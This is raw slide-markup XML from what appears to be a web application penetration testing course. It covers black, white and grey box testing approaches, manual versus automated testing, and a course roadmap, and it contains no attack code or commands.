              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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685800" y="121920"/>
            <a:ext cx="7772400" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Black Box </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Little or no information provided to the testers in advance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Perhaps just the name of the target enterprise, an IP address range, or possibly a URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The target is a black box that the tester must explore to understand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically not done in web application testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Except in the movies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We advise against such an approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Hardest to accomplish because most enterprises have multiple applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Requires close coordination between testers and target system personnel to make sure testers remain in scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cube 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7637463" y="3505200"/>
            <a:ext cx="1125537" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="95000"/>
              <a:lumOff val="5000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="95000"/>
                <a:lumOff val="5000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-c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685800" y="91440"/>
            <a:ext cx="7772400" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>White Box </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335280" y="1645920"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Completely open test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testers are provided with information in advance, potentially including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Target URL(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application functionality summary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Test accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As test progresses, target system personnel answer questions for the testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Often performed by an internal team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Increasingly third-party testers are engaging in this type of test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Integral part of the development process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Source code is sometimes available to the tester</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cube 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7347903" y="2606040"/>
            <a:ext cx="1125537" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="95000"/>
                <a:lumOff val="5000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>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685800" y="106680"/>
            <a:ext cx="7772400" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Grey Box </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107523" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testers are provided some limited information at the outset of a test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User Accounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As the test progresses, information gathering is critical for success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most tests performed today fall into this category</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is the model explored in class since it is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>the most common form of test </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cube 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7345680" y="4983480"/>
            <a:ext cx="1125538" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="95000"/>
                <a:lumOff val="5000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-c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219075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testing Methods: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manual vs. Automated Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108547" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1630680"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are two general methods for testing web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manual testing using scripts and tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using automated testing tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We are often asked, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Which works better?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s explore the pros and cons of each approach in more detail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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219075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manual Web App</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109571" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350520" y="1645920"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Human tester processes each page of the target application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Although we call this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>manual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> testing, scripts and interactive tools are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Tools are used to help formulate and manipulate requests and gather and analyze responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Time consuming, because a human tester controls each request and analyzes each response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Thoroughness of such testing depends on tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s time, attention, and skill set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Able to discover logic or business flaws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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
